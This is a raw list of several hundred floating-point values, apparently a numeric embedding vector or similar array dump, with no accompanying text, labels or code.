0.016259679570794106, 0.030621344223618507, -0.008169381879270077, -0.013286120258271694, -0.04849433898925781, -0.016576016321778297, -0.0037980114575475454, -0.00653234263882041, -0.0015599328326061368, -0.005168142728507519, 0.03890935331583023, -0.005658463574945927, -0.017351040616631508, 0.013333570212125778, 0.03242446109652519, 0.021384326741099358, -0.02655642293393612, -0.024705857038497925, 0.017572475597262383, -0.03331020101904869, 0.03264589607715607, -0.00805075652897358, -0.026034468784928322, -0.028849860653281212, 0.03055807575583458, 0.03663172945380211, 0.016607649624347687, -0.013127951882779598, 0.008778329007327557, -0.027885034680366516, -0.0434013269841671, 0.0066311974078416824, 0.019944997504353523, -0.004274492617696524, -0.013562913984060287, 0.01649693213403225, 0.003730789991095662, 0.000769092352129519, 0.004015492741018534, -0.01428257953375578, 0.00681309076026082, -0.011285293847322464, -0.024199718609452248, -0.00013431931438390166, -0.03125401586294174, -0.03293059766292572, 0.018157698214054108, -0.015112961642444134, -0.011617446318268776, -0.004155866801738739, 0.006018295884132385, 0.009925047867000103, 0.020988905802369118, -0.01565864123404026, -0.028802409768104553, 0.03213975578546524, 0.03615722805261612, -0.016718367114663124, -0.0019326164619997144, -0.03133310005068779, -0.013736899010837078, -0.01487570907920599, -0.011664897203445435, 0.03457554429769516, 0.038846082985401154, 0.0092765586450696, 0.03261426091194153, 0.0017190894577652216, -0.019929179921746254, -0.013499647378921509, 0.012582272291183472, 0.0064453501254320145, -0.0027283995877951384, 0.04030122980475426, -0.03337346762418747, 0.008770421147346497, 0.0028885449282824993, 0.0010488522239029408, 0.018252598121762276, 0.013373112305998802, -0.01266135647892952, 0.010383735410869122, 0.004254722036421299, 0.008651794865727425, -0.024231351912021637, 0.024610955268144608, -0.0051404633559286594, 0.001354314386844635, -0.029213648289442062, -0.0008466935832984746, -0.017161238938570023, -0.05627620965242386, -0.0005990616627968848, 0.015002244152128696, 0.006544204894453287, 0.0076276566833257675, 0.020292967557907104, -0.0016775703988969326, -0.01643366552889347, -0.003345255274325609, 0.005437028128653765, -0.023219076916575432, 0.010707980021834373, 0.004294263664633036, 0.012851158156991005, 0.000108740568975918, -0.020561853423714638, -0.007390404120087624, 0.029087113216519356, 0.024389520287513733, 0.03223465755581856, -0.03212394192814827, 0.028644243255257607, -0.01765155978500843, -0.01183097343891859, 0.01183097343891859, 0.030384091660380363, 0.011554179713129997, 0.0007344930781982839, 0.007825366221368313, 0.027584515511989594, 0.016141055151820183, 0.034354109317064285, 0.016560200601816177, 0.02967233583331108, -0.010976865887641907, -0.016750002279877663, 0.039573658257722855, -0.01725613884627819, -0.008501535281538963, 0.014472381211817265, 0.03410104289650917, -0.0060815634205937386, -0.029102928936481476, 0.011870515532791615, -0.015286946669220924, 0.017113788053393364, 0.007987488992512226, 0.001154627068899572, 0.005516112316399813, -0.01083451509475708, 0.004824127070605755, 0.0030111251398921013, 0.03587252274155617, 0.012163126841187477, 0.013918792828917503, 0.013958334922790527, -0.001452180789783597, -0.010106941685080528, 0.023804299533367157, -0.010447002947330475, -0.010961049236357212, -0.029419265687465668, 0.012511096894741058, -0.03267752751708031, -0.004705500788986683, -0.009814330376684666, -0.0031831329688429832, 0.008722970262169838, -0.006987075787037611, 0.015666550025343895, 0.013270303606987, 0.006919854320585728, -0.02090982161462307, -0.015721909701824188, 0.019185790792107582, -0.0124636460095644, 0.002091773087158799, -0.005607059225440025, -0.0013483830261975527, -0.022190984338521957, -0.018964353948831558, -0.014677999541163445, 0.0007671152707189322, 0.021937914192676544, -0.0257339496165514, -0.027948303148150444, 0.014804533682763577, -0.027631966397166252, 0.014179769903421402, 0.011688622646033764, 0.002030482981353998, 0.0007977603236213326, 0.012621814385056496, -0.013531280681490898, -0.03865628316998482, 0.017888812348246574, 0.033879607915878296, 0.08066572993993759, -0.00016793003305792809, -0.010312560014426708, -0.006907991599291563, -0.004519653506577015, -0.00027382851112633944, -0.0007048365660011768, -0.00037144788075238466, -0.003380842972546816, 0.01773064397275448, 0.029213648289442062, -0.003892912296578288, 0.017398491501808167, 0.012163126841187477, 0.00412818742915988, 0.016077786684036255, -0.018648019060492516, -0.013989968225359917, 0.014393297024071217, -0.0028944762889295816, 0.010383735410869122, -0.01205240935087204, 0.013902976177632809, -0.018252598121762276, 0.01728777214884758, 0.00007265846943482757, -0.008398725651204586, -0.011736072599887848, -0.013989968225359917, -0.008770421147346497, -0.0006672716699540615, -0.004274492617696524, 0.0009989304235205054, -0.006034113001078367, 0.02094145677983761, 0.011032224632799625, 0.008216832764446735, 0.005006020423024893, -0.010858239606022835, -0.005903623998165131, -0.00024713765014894307, -0.007034526206552982, -0.00825637485831976, 0.005962937138974667, 0.0018367270240560174, -0.020593486726284027, 0.025939567014575005, 0.005713822320103645, -0.03142800182104111, -0.010850331746041775, -0.00491111958399415, -0.02451605536043644, 0.02450023777782917, 0.01730358973145485, 0.002821323461830616, 0.01724032312631607, -0.0005763249937444925, -0.00840663444250822, 0.0025623231194913387, 0.0006895140395499766, -0.010739614255726337, 0.01443283911794424, 0.006042021326720715, 0.01932814158499241, 0.006777503062039614, -0.018284231424331665, -0.019454676657915115, 0.0033413011115044355, -0.015089236199855804, 0.015698183327913284, 0.010794973000884056, -0.011396011337637901, 0.008889047428965569, 0.00376044656150043, 0.009324009530246258, 0.017540842294692993, 0.009355642832815647, 0.019138339906930923, -0.033120401203632355, 0.009031398221850395, 0.012147310189902782, 0.03221883997321129, 0.008398725651204586, 0.02212771587073803, -0.005385623779147863, 0.02369358018040657, -0.0065086171962320805, -0.0012712760362774134, 0.003932454157620668, -0.001002884586341679, -0.00826428271830082, 0.012645539827644825, -0.003440156113356352, 0.015310672111809254, 0.01932814158499241, 0.03941548988223076, 0.006401853635907173, 0.004480111412703991, -0.0013434402644634247, -0.007429946213960648, 0.01061307918280363, -0.008046802133321762, 0.02045113407075405, 0.0023310023825615644, -0.0002698743192013353, 0.013412654399871826, 0.002497078850865364, 0.007706740405410528, 0.02211190015077591, 0.004907165188342333, -0.024199718609452248, -0.03467044606804848, 0.011910057626664639, -0.029055479913949966, -0.015033877454698086, 0.012692989781498909, 0.01890108734369278, 0.01765155978500843, -0.019786829128861427, 0.003542965278029442, -0.00865970365703106, -0.007062205579131842, 0.033879607915878296, -0.01587216928601265, -0.0013889136025682092, -0.0036655457224696875, 0.005694051273167133, -0.02211190015077591, 0.0353347547352314, 0.03296223282814026, -0.0005328287952579558, 0.0023626359179615974, -0.0037762632127851248, -0.02124197594821453, 0.0229501910507679, -0.039225686341524124, 0.029561616480350494, 0.02369358018040657, 0.015943344682455063, 0.00691194599494338, -0.01124575175344944, 0.04137677326798439, 0.021827196702361107, -0.003936408553272486, 0.015943344682455063, 0.009932956658303738, 0.029134564101696014, 0.014970610849559307, 0.00782141275703907, 0.03362653777003288, 0.016322948038578033, -0.01807861402630806, 0.0020364143420010805, 0.039194054901599884, -0.01083451509475708, 0.005662417970597744, 0.0208149217069149, -0.026777857914566994, -0.007078022230416536, 0.015144594945013523, 0.012091951444745064, 0.026967661455273628, 0.04030122980475426, -0.02046695165336132, -0.005389577709138393, 0.025180360302329063, -0.021052174270153046, -0.04830453544855118, -0.0224282369017601, -0.01852148398756981, -0.0086122527718544, 0.0032029040157794952, -0.004499882459640503, 0.02285528928041458, 0.029071295633912086, 0.014591006562113762, 0.014970610849559307, -0.0030289189890027046, 0.032709162682294846, -0.026018651202321053, 0.00012146815424785018, 0.003256285795941949, -0.02168484590947628, 0.012708806432783604, 0.028343722224235535, 0.0005313459550961852, -0.01126947719603777, 0.02979886904358864, -0.02015061490237713, 0.015832627192139626, 0.004345668479800224, 0.01086614839732647, -0.017572475597262383, -0.005128600634634495, -0.01720868982374668, -0.003918614704161882, -0.004223088268190622, -0.026698775589466095, -0.010360009968280792, 0.010067399591207504, 0.003376888809725642, -0.0026018652133643627, -0.02171647921204567, 0.009972498752176762, -0.00461059994995594, -0.027568699792027473, -0.0017606086330488324, 0.010225567035377026, -0.018600568175315857, 0.0018980171298608184, -0.009735246188938618, 0.032392825931310654, 0.0285177081823349, -0.015358122065663338, 0.017525024712085724, 0.003540988313034177, 0.009165841154754162, -0.015492564998567104, 0.009142115712165833, -0.000695445341989398, -0.007386450190097094, 0.014883617870509624, 0.01504969410598278, -0.007006846833974123, 0.002597911050543189, 0.016623467206954956, 0.025781400501728058, -0.04776676371693611, -0.0038276680279523134, 0.0027026974130421877, -0.020182250067591667, -0.007307366002351046, 0.022001182660460472, 0.012859066016972065, -0.013167493976652622, -0.0172245055437088, -0.0033235070295631886, 0.009814330376684666, -0.014535647816956043, -0.016670918092131615, 0.011925874277949333, 0.005006020423024893, -0.02255477011203766, 0.007034526206552982, -0.006718189921230078, -0.00013716139073949307, -0.002303323009982705, 0.001543127465993166, -0.006979167461395264, 0.04703919216990471, -0.012250118888914585, -0.010146483778953552, -0.007054297253489494, 0.009434727020561695, -0.011103400029242039, 0.04688102379441261, 0.031174931675195694, 0.0018831889610737562, 0.008770421147346497, -0.01061307918280363, -0.01733522303402424, 0.004523607436567545, 0.0014729404356330633, 0.003145568072795868, -0.0030328731518238783, 0.03890935331583023, -0.019913364201784134, 0.0032721024472266436, 0.0025959338527172804, 0.0006005445029586554, 0.018837820738554, -0.010399552062153816, -0.004076782613992691, -0.02095727249979973, -0.00018003977311309427, -0.005994570907205343, 0.02326652780175209, -0.02453187108039856, 0.014037418179214, -0.0062476396560668945, -0.012582272291183472, 0.06469075381755829, 0.0036260036285966635, -0.016560200601816177, 0.019122522324323654, -0.009885505773127079, -0.04254721850156784, 0.011467186734080315, 0.00036897649988532066, -0.01426676195114851, -0.012447829358279705, 0.004365439526736736, -0.009948773309588432, -0.02443697117269039, 0.01814188063144684, 0.016765817999839783, -0.017778094857931137, 0.020672570914030075, -0.042325783520936966, 0.014377480372786522, 0.022238435223698616, 0.0074457633309066296, 0.010676346719264984, 0.01408486906439066, -0.02377266436815262, 0.010921507142484188, -0.018205147236585617, -0.018711285665631294, 0.0062239146791398525, -0.01806279644370079, 0.010383735410869122, -0.041598208248615265, -0.022728756070137024, -0.021447593346238136, -0.0049822949804365635, -0.0010755431139841676, -0.002224238822236657, 0.005931303836405277, -0.006152738817036152, -0.00012653447629418224, 0.008351275697350502, -0.009932956658303738, -0.06972049921751022, -0.030210105702280998, -0.010209750384092331, 0.004575012251734734, -0.011182484216988087, -0.009561261162161827, 0.004021423868834972, -0.03202904015779495, 0.02249150350689888, 0.024405337870121002, 0.019486309960484505, 0.011063857935369015, -0.011609538458287716, -0.008968130685389042, 0.0007522869855165482, 0.0076118395663797855, -0.0052472264505922794, -0.004618508275598288, -0.029609067365527153, 0.03973182663321495, -0.01652856543660164, 0.00016706505266483873, 0.03852974995970726, 0.025132911279797554, -0.003981881774961948, 0.01083451509475708, -0.0031692932825535536, -0.011522545479238033, -0.026414072141051292, -0.019802644848823547, 0.010779155418276787, 0.007892588153481483, -0.0010676346719264984, 0.0014353754231706262, 0.019059255719184875, 0.016576016321778297, -0.006002479232847691, -0.02128942497074604, -0.02211190015077591, 0.02208026684820652, 0.007461579982191324, -0.011198300868272781, 0.010383735410869122, 0.009268650785088539, -0.006500708870589733, 0.016939803957939148, -0.008454084396362305, -0.023487962782382965, -0.017857179045677185, 0.004068874288350344, -0.011633263900876045, 0.0027659644838422537, 0.0026671094819903374, -0.002843071473762393, 0.0172245055437088, -0.005199776031076908, -0.01692398637533188, 0.03264589607715607, -0.003997698426246643, -0.012787890620529652, -0.0018792346818372607, -0.0002148861822206527, -0.028233004733920097, -0.0029182014986872673, -0.005516112316399813, 0.0120603172108531, 0.011324835941195488, -0.014741267077624798, -0.009996224194765091, 0.028233004733920097, 0.017161238938570023, 0.028027387335896492, -0.003920591901987791, 0.014923159964382648, -0.0028905218932777643, -0.013238669373095036, -0.023076726123690605, 0.015437206253409386, 0.029023846611380577, 0.00880996324121952, -0.007255961652845144, 0.02121034264564514, -0.008114023134112358, 0.010470728389918804, -0.006963350344449282, -0.028011569753289223, 0.038719549775123596, -0.01164908055216074, 0.02617681957781315, 0.0017675284761935472, 0.02094145677983761, -0.016670918092131615, -0.0009074894478544593, 0.004693638067692518, -0.0009915162809193134, 0.016971437260508537, -0.002247964031994343, 0.012020775116980076, 0.02408900111913681, 0.009482176974415779, -0.014108594506978989, -0.032709162682294846, 0.011340652592480183, -0.0172245055437088, 0.008224740624427795, 0.007303412072360516, -0.009086756967008114, 0.007995396852493286, 0.004745042882859707, 0.016734184697270393, 0.011032224632799625, 0.008675520308315754, 0.0074220378883183, 0.005864082369953394, -0.01387925073504448, -0.007180831395089626, -0.00024787907022982836, -0.02094145677983761, 0.001835738425143063, -0.015761451795697212, -0.019565394148230553, 0.010391644202172756, 0.0019177881767973304, -0.006983121391385794, -0.013127951882779598, -0.009173749946057796, 0.005211638752371073, 0.00795980915427208, -0.004238904919475317, 0.001009804429486394, -0.0002659201272763312, 0.001895051565952599, 0.0029458808712661266, -0.006397899705916643, 0.010992682538926601, 0.01086614839732647, -0.01771482639014721, 0.01043909415602684, -0.00491507351398468, -0.025496697053313255, 0.005243272520601749, 0.003384797368198633, 0.011340652592480183, 0.02402573451399803, -0.007153152022510767, 0.011237842962145805, -0.002649315632879734, -0.023788481950759888, 0.03346836939454079, -0.0038889581337571144, 0.007900496013462543, -0.0033729346469044685, 0.008137748576700687, -0.0014076960505917668, -0.017066337168216705, -0.013926700688898563, -0.003600301221013069, -0.018220964819192886, 0.01689235307276249, 0.005089058540761471, -0.006441395729780197, 0.0007755179540254176, -0.0028687738813459873, 0.014108594506978989, 0.013373112305998802, 0.01814188063144684, 0.009917140007019043, 0.0030210106633603573, 0.008596436120569706, 0.01443283911794424, -0.018537301570177078, 0.0008076458470895886, 0.010510270483791828, 0.011688622646033764, -0.004689684137701988, 0.010518178343772888, 0.017920445650815964, -0.014527739956974983, 0.005729639437049627, -0.009790604934096336, 0.014575189910829067, 0.002030482981353998, 0.015967069193720818, -0.001476894598454237, -0.0037584693636745214, 0.005753364413976669, 0.0023507734294980764, -0.007010800763964653, -0.00921329203993082, -0.001830795779824257, -0.026730408892035484, 0.009434727020561695, 0.005290722940117121, 0.002941926708444953, -0.011174576357007027, -0.001592555083334446, -0.006923808250576258, -0.00865970365703106, 0.001718100975267589, 0.010352102108299732, -0.012337111867964268, -0.005460753571242094, -0.005737547762691975, 0.01643366552889347, 0.0011417759815230966, 0.014543556608259678, 0.005231409799307585, -0.0213368758559227, -0.009094665758311749, 0.0005817620549350977, -0.003740675514563918, -0.034733712673187256, -0.009545444510877132, -0.0020285057835280895, 0.014559373259544373, -0.021495044231414795, 0.003663568524643779, -0.006042021326720715, 0.027790134772658348, 0.009553353302180767, -0.0050653330981731415, 0.02249150350689888, 0.0062832278199493885, -0.017857179045677185, -0.0075881145894527435, -0.014598915353417397, -0.02168484590947628, -0.005634738598018885, 0.0007201590924523771, -0.015081328339874744, 0.007311320398002863, -0.017509208992123604, -0.013135860674083233, 0.005172096658498049, -0.009861781261861324, -0.001725020818412304, -0.015033877454698086, 0.020324600860476494, 0.006785411387681961, -0.009545444510877132, 0.010099032893776894, 0.020245516672730446, 0.0048992568626999855, 0.003003216814249754, 0.007532755844295025, 0.008240558207035065, -0.003521217266097665, -0.02612937055528164, 0.0035647135227918625, 0.008968130685389042, 0.0026117507368326187, 0.007473442703485489, -0.004195408895611763, 0.008485718630254269, -0.01882200315594673, -0.010723796673119068, 0.017604108899831772, -0.0048597147688269615, 0.02655642293393612, 0.01527113001793623, -0.015800992026925087, -0.005361898336559534, -0.0022084221709519625, -0.01651274971663952, 0.018727103248238564, -0.01081869751214981, -0.01809442974627018, -0.00330373621545732, 0.01064471248537302, 0.02377266436815262, -0.01086614839732647, -0.01646529883146286, -0.007006846833974123, -0.0011753867147490382, -0.02136850915849209, -0.0006667773704975843, -0.007054297253489494, 0.003408522577956319, 0.005298631265759468, -0.005788952577859163, -0.020767470821738243, -0.018948538228869438, -0.003930477425456047, 0.012416196055710316, 0.00921329203993082, -0.0005120692076161504, -0.016243863850831985, -0.016718367114663124, 0.0036161181051284075, -0.005294676870107651, -0.0025109185371547937, 0.0037584693636745214, -0.025528330355882645, -0.013863434083759785, -0.011981233023107052, -0.016354581341147423, 0.0027363081462681293, -0.023045090958476067, 0.018189331516623497, 0.009553353302180767, -0.01025720126926899, 0.007540664169937372, 0.011807247996330261, -0.004614554345607758, 0.00501788267865777, -0.024753307923674583, 0.0029004074167460203, 0.00296367472037673, 0.006789365783333778, 0.03095349669456482, 0.019075073301792145, 0.027394713833928108, 0.004389164503663778, 0.015437206253409386, -0.020008264109492302, -0.008825779892504215, -0.0019029598915949464, -0.008288008160889149, 0.01926487497985363, 0.0031692932825535536, 0.011190393008291721, 0.029814686626195908, -0.005986662581562996, 0.009078849107027054, 0.016797451302409172, -0.005583333782851696, -0.012321295216679573, 0.008770421147346497, 0.02402573451399803, 0.016212230548262596, 0.00216690287925303, -0.0025247582234442234, 0.00521954707801342, -0.014076960273087025, -0.0015688297571614385, -0.017351040616631508, -0.008548985235393047, 0.010581445880234241, 0.01771482639014721, -0.005286768544465303, -0.013238669373095036, 0.0064888461492955685, 0.0018426583847030997, -0.01423512864857912, 0.021843014284968376, 0.028074836358428, 0.006524433847516775, 0.002356704557314515, 0.002821323461830616, -0.010217659175395966, 0.006734006572514772, 0.005935257766395807, -0.019597027450799942, 0.0018238758202642202, 0.003568667685613036, -0.006473029498010874, -0.0077344197779893875, 0.006077609024941921, -0.004124233033508062, -0.01733522303402424, 0.006192280910909176, 0.0037644007243216038, 0.0092765586450696, -0.027473798021674156, -0.017161238938570023, 0.006291136145591736, 0.0018337613437324762, -0.008999764919281006, 0.006647014059126377, -0.003278033807873726, 0.0016083718510344625, -0.01025720126926899, 0.0020235630217939615, -0.024563506245613098, -0.010360009968280792, 0.00009595119627192616, 0.0051048751920461655, -0.001238653901964426, 0.002307277172803879, 0.0046540964394807816, 0.006441395729780197, 0.014124411158263683, -0.02655642293393612, 0.013033051043748856, 0.0010874057188630104, 0.00011152086517540738, 0.001030069775879383, 0.007078022230416536, 0.02608191967010498, -0.003934431355446577, 0.007868862710893154, -0.012455737218260765, -0.0029972854536026716, 0.012795799411833286, -0.00423099659383297, -0.013112135231494904, 0.016544383019208908, -0.015010152012109756, -0.005599150434136391, 0.007291549351066351, 0.005650555249303579, -0.0224282369017601, 0.000055266158597078174, 0.0007567355060018599, -0.019944997504353523, -0.016370398923754692, -0.02530689537525177, -0.000997941824607551, -0.001319715054705739, 0.03565108776092529, 0.03599905967712402, 0.0016311084618791938, -0.000015384319340228103, 0.007686969358474016, 0.00762370228767395, -0.014013693667948246, -0.017192872241139412, 0.005207684822380543, 0.034259211272001266, 0.009331917390227318, 0.0036260036285966635, 0.016077786684036255, 0.013349387794733047, 0.006824953481554985, -0.0063860369846224785, 0.002862842520698905, -0.035176586359739304, 0.017192872241139412, -0.00983014702796936, 0.018663834780454636, -0.010146483778953552, 0.005452845245599747, 0.006615380756556988, 0.0020897958893328905, 0.00037441353197209537, -0.00711756432428956, -0.0026967660523951054, -0.018173513934016228, -0.0020166432950645685, 0.017082154750823975, 0.016971437260508537, 0.005357944406569004, -0.0063029988668859005, -0.0006044987239874899, 0.0019573301542550325, -0.01507341954857111, -0.009292375296354294, -0.0037288127932697535, -0.005239318124949932, -0.011459278874099255, 0.036694999784231186, -0.02328234352171421, -0.012155218049883842, -0.010739614255726337, 0.016576016321778297, -0.01345219649374485, 0.004772722255438566, 0.0002216824796050787, 0.02008734829723835, 0.002760033356025815, -0.018742918968200684, 0.004298218060284853, 0.016939803957939148, -0.010794973000884056, 0.011712347157299519, 0.0014986427268013358, 0.011396011337637901, -0.025449246168136597, 0.010352102108299732, 0.013713173568248749, -0.009932956658303738, 0.008106115274131298, -0.006579793058335781, -0.005045562516897917, -0.00033141160383820534, -0.0050613791681826115, 0.0003034850233234465, -0.014361662790179253, -0.009640345349907875, -0.011633263900876045, -0.007813503965735435, -0.0010626919101923704, 0.012898608110845089, -0.000039263995859073475, 0.01327821146696806, 0.0051009212620556355, 0.0065283882431685925, 0.020308783277869225, -0.005638692528009415, 0.002196559449657798, -0.031159115955233574, -0.007943992502987385, 0.012700898572802544, 0.002137246308848262, 0.005607059225440025, 0.020340416580438614, 0.019106706604361534, -0.010154391638934612, -0.0028766822069883347, -0.004488019738346338, 0.004007583949714899, -0.0074220378883183, -0.012890700250864029, -0.009608712047338486, -0.015721909701824188, -0.0016607650322839618, 0.013665723614394665, -0.009932956658303738, -0.017018888145685196, 0.007987488992512226, 0.007963763549923897, -0.013547097332775593, -0.016212230548262596, 0.008359183557331562, 0.004934844560921192, -0.02045113407075405, -0.007370633538812399, 0.037074603140354156, -0.00903930701315403, 0.009893414564430714, 0.01768319308757782, -0.01882200315594673, 0.009711520746350288, -0.0065086171962320805, 0.0018980171298608184, -0.0028648197185248137, 0.001015241490676999, -0.00825637485831976, 0.019850095734000206, 0.009521719068288803, 0.013341479003429413, 0.02372521534562111, 0.0008086343877948821, -0.008295916952192783, -0.00025751744396984577, -0.03017847239971161, -0.001263367710635066, 0.000018365417417953722, 0.0007601954275742173, 0.0120603172108531, 0.012779981829226017, -0.021147074177861214, -0.004151912406086922, -0.01547674834728241, 0.00412818742915988, -0.007026617880910635, -0.024974742904305458, -0.015895893797278404, -0.017050521448254585, -0.007987488992512226, 0.003705087583512068, 0.007619747892022133, -0.00752484705299139, 0.004681775812059641, 0.002852956997230649, -0.005970845464617014, -0.021131258457899094, 0.021985365077853203, -0.007995396852493286, 0.025496697053313255, 0.013910884037613869, -0.014630548655986786, -0.025211995467543602, -0.006089471746236086, -0.0005783021333627403, 0.012218485586345196, -0.008007260039448738, -0.022760389372706413, -0.012487371452152729, 0.03764400631189346, 0.00016026876983232796, 0.03128565102815628, 0.01769901067018509, 0.010984774678945541, -0.007868862710893154, -0.007596022915095091, -0.0063069527968764305, -0.00012702874664682895, 0.01003576535731554, -0.011910057626664639, -0.007350862491875887, 0.033974505960941315, 0.01489943452179432, 0.014654274098575115, -0.005607059225440025, -0.010510270483791828, -0.009703612886369228, 0.03139636665582657, 0.008952314034104347, 0.021020540967583656, 0.0003027436323463917, -0.023076726123690605, 0.014417022466659546, 0.00613296777009964, -0.01725613884627819, -0.020324600860476494, -0.015943344682455063, 0.00985387247055769, 0.017525024712085724, 0.015943344682455063, -0.003906751982867718, 0.0026236132252961397, -0.007172923069447279, -0.022981824353337288, 0.010320467874407768, -0.005148371681571007, -0.004867623094469309, -0.014456563629209995, 0.00683681620284915, 0.00542121147736907, 0.009466360323131084, 0.023013457655906677, -0.02775850147008896, 0.009980406612157822, 0.01483616791665554, 0.011870515532791615, -0.0032206978648900986, 0.009980406612157822, -0.007801641244441271, -0.003438178915530443, 0.000015168073332461063, -0.013744807802140713, -0.02212771587073803, -0.01463845744729042, -0.004317989107221365, 0.002649315632879734, 0.01646529883146286, -0.01342056319117546, 0.025939567014575005, -0.004227042198181152, -0.006484891753643751, -0.01148300338536501, -0.006279273424297571, -0.02450023777782917, 0.0033057131804525852, -0.0032543085981160402, 0.024247169494628906, -0.016750002279877663, 0.0029083159752190113, -0.019075073301792145, 0.0164178479462862, 0.016623467206954956, -0.008288008160889149, -0.003499469254165888, -0.009363551624119282, -0.028248822316527367, -0.002791666891425848, -0.0004221111012157053, -0.00964825414121151, -0.015097144991159439, 0.01347592193633318, 0.014859892427921295, -0.015880076214671135, 0.019391408190131187, 0.009766880422830582, -0.021779747679829597, 0.013460105285048485, -0.006200189236551523, -0.008137748576700687, -0.0046540964394807816, -0.025781400501728058, -0.019992448389530182, -0.003335369750857353, -0.018284231424331665, -0.013436379842460155, 0.009086756967008114, 0.009023490361869335, -0.010597262531518936, 0.008596436120569706, -0.0016923986840993166, 0.020308783277869225, 0.020356234163045883, 0.018790369853377342, -0.010162300430238247, 0.007975626736879349, -0.020688386633992195, 0.02764778397977352, -0.01183097343891859, 0.003467835485935211, -0.0011042110854759812, 0.00033610721584409475, 0.00820101611316204, 0.006650968454778194, -0.0037762632127851248, -0.002526735421270132, 0.013918792828917503, 0.006726098246872425, 0.005006020423024893, 0.02174811251461506, 0.0013770509976893663, -0.01321494486182928, -0.012803707271814346, 0.01591961830854416, -0.0001303651079069823, -0.026034468784928322, 0.004353576805442572, 0.012692989781498909, 0.003989790100604296, -0.009877597913146019, 0.006979167461395264, -0.005373761057853699, -0.0442870669066906, -0.025813033804297447, -0.014393297024071217, -0.004035263787955046, -0.016386214643716812, 0.00820101611316204, -0.013357295654714108, 0.009055123664438725, -0.0024713764432817698, -0.005864082369953394, -0.0025030102115124464, 0.002164925914257765, 0.017952078953385353, 0.005618921481072903, 0.012519004754722118, -0.0006791342748329043, 0.0027877127286046743, 0.0019296507816761732, 0.0027026974130421877, -0.018537301570177078, 0.017050521448254585, -0.013286120258271694, 0.0018298071809113026, -0.014970610849559307, -0.016354581341147423, 0.015294854529201984, 0.006042021326720715, -0.003187087131664157, 0.01084242295473814, -0.004325897432863712, -0.017540842294692993, 0.014306304045021534, 0.0010626919101923704, 0.010383735410869122, 0.022380786016583443, -0.0012010890059173107, 0.0014492152258753777, -0.008070527575910091, -0.011356469243764877, -0.004369393456727266, 0.01562700793147087, 0.04061756655573845, -0.01720868982374668, -0.025069642812013626, 0.006603518035262823, -0.025069642812013626, 0.03289896249771118, 0.0024298573844134808, -0.01005158293992281, -0.02328234352171421, 0.001776425400748849, -0.004183546174317598, 0.00542121147736907, -0.01187842432409525, -0.01643366552889347, 0.0082089239731431, 0.004076782613992691, -0.010723796673119068, 0.00724409893155098, 0.008533168584108353, -0.012416196055710316, 0.0049981120973825455, 0.0003012607921846211, 0.009790604934096336, 0.018236782401800156, 0.017398491501808167, 0.02606610208749771, -0.014614732004702091, 0.019154157489538193, 0.003851393237709999, -0.019818462431430817, -0.018189331516623497, -0.00860434491187334, -0.008493626490235329, 0.03248772770166397, 0.0058284942060709, -0.006753777619451284, 0.006176464259624481, -0.012716715224087238, 0.013127951882779598, 0.007564389146864414, -0.021542495116591454, 0.016046153381466866, 0.006176464259624481, -0.0034124767407774925, 0.00572173111140728, 0.009885505773127079, -0.005994570907205343, 0.015231587924063206, 0.007584160193800926, -0.0008279111352749169, 0.005662417970597744, -0.018394948914647102, 0.009964589960873127, 0.004124233033508062, -0.005255135241895914, -0.011949599720537663, 0.009094665758311749, -0.03296223282814026, 0.0024397429078817368, -0.01084242295473814, 0.0022618037182837725, 0.0006035101250745356, -0.009316100738942623, -0.006864495575428009, 0.013460105285048485, -0.02086237259209156, 0.008066573180258274, -0.01690816879272461, 0.0018545209895819426, 0.03849811479449272, 0.005943166092038155, -0.005864082369953394, -0.008382908999919891, -0.010494452901184559, -0.0012821501586586237, -0.012163126841187477, -0.013175402767956257, 0.01148300338536501, 0.011751889251172543, -0.014330029487609863, -0.02122615836560726, 0.009608712047338486, -0.019502125680446625, -0.014575189910829067, -0.0007428957615047693, 0.007797687314450741, -0.046026915311813354, 0.007252007257193327, 0.00021093199029564857, -0.005298631265759468, -0.005504249595105648, 0.0018683606758713722, -0.025164544582366943, 0.009766880422830582, 0.015366030856966972, -0.003661591559648514, 0.009703612886369228, 0.014741267077624798, 0.00330373621545732, 0.012756257317960262, -0.007212465163320303, -0.019612843170762062, -0.003740675514563918, 0.025465063750743866, -0.014156044460833073, -0.00001788658664736431, 0.00004572046600515023, -0.0009934933623299003, -0.008786237798631191, 0.03217139095067978, 0.0031238198280334473, 0.007137335371226072, 0.0014353754231706262, 0.010779155418276787, -0.020292967557907104, -0.012526913546025753, 0.005796860903501511, 0.004887394141405821, 0.016750002279877663, -0.0075288014486432076, 0.0032404689118266106, -0.011609538458287716, -0.00031781900906935334, -0.01966029405593872, 0.008319641463458538, 0.004871577490121126, -0.00023626360052730888, -0.02287110686302185, 0.009347734972834587, 0.03179178759455681, 0.003313621738925576, 0.005452845245599747, -0.017177054658532143, 0.012487371452152729, 0.01763574220240116, 0.02043531835079193, -0.0001805340580176562, -0.004023401066660881, -0.0016014520078897476, -0.01768319308757782, -0.007888633757829666, 0.020640935748815536, -0.0003442627494223416, 0.007916313596069813, 0.00825637485831976, 0.003659614361822605, 0.006765640340745449, 0.008114023134112358, -0.010217659175395966, 0.001715135294944048, -0.007224327884614468, 0.007267823908478022, -0.014076960273087025, 0.004808309953659773, 0.003673454048112035, 0.0036774082109332085, -0.0075920685194432735, -0.008030985482037067, 0.0046975924633443356, -0.009078849107027054, -0.008493626490235329, -0.015120870433747768, -0.015358122065663338, -0.005172096658498049, -0.01304095983505249, 0.022665487602353096, -0.008319641463458538, -0.011593721807003021, 0.0030625297222286463, 0.009284467436373234, -0.004325897432863712, -0.0005392543389461935, 0.003993744496256113, -0.005650555249303579, 0.012882791459560394, -0.013270303606987, 0.0022795978002250195, 0.00866761151701212, 0.01324657816439867, -0.009316100738942623, 0.02086237259209156, 0.024690039455890656, 0.012906516902148724, -0.001122993533499539, 0.00734690809622407, 0.011388102546334267, -0.002081887563690543, 0.011720255948603153, 0.0177464596927166, -0.002121429657563567, -0.002590002492070198, 0.003600301221013069, 0.018173513934016228, 0.014504014514386654, -0.013847616501152515, 0.00007482092769350857, -0.010739614255726337, -0.003487606532871723, 0.009885505773127079, 0.003084277966991067, 0.0001811519032344222, -0.0030308961868286133, -0.0076909237541258335, 0.0019039484905079007, 0.014306304045021534, -0.00964825414121151, -0.011641171760857105, -0.0012554592685773969, 0.0027738730423152447, -0.00018288186402060091, 0.016670918092131615, -0.009268650785088539, 0.008556894026696682, 0.00521954707801342, -0.0027481706347316504, 0.007050342857837677, 0.0014907342847436666, 0.006540250964462757, -0.007058251183480024, -0.0065916553139686584, 0.011253660544753075, -0.006022250279784203, 0.005551700014621019, -0.015350214205682278, 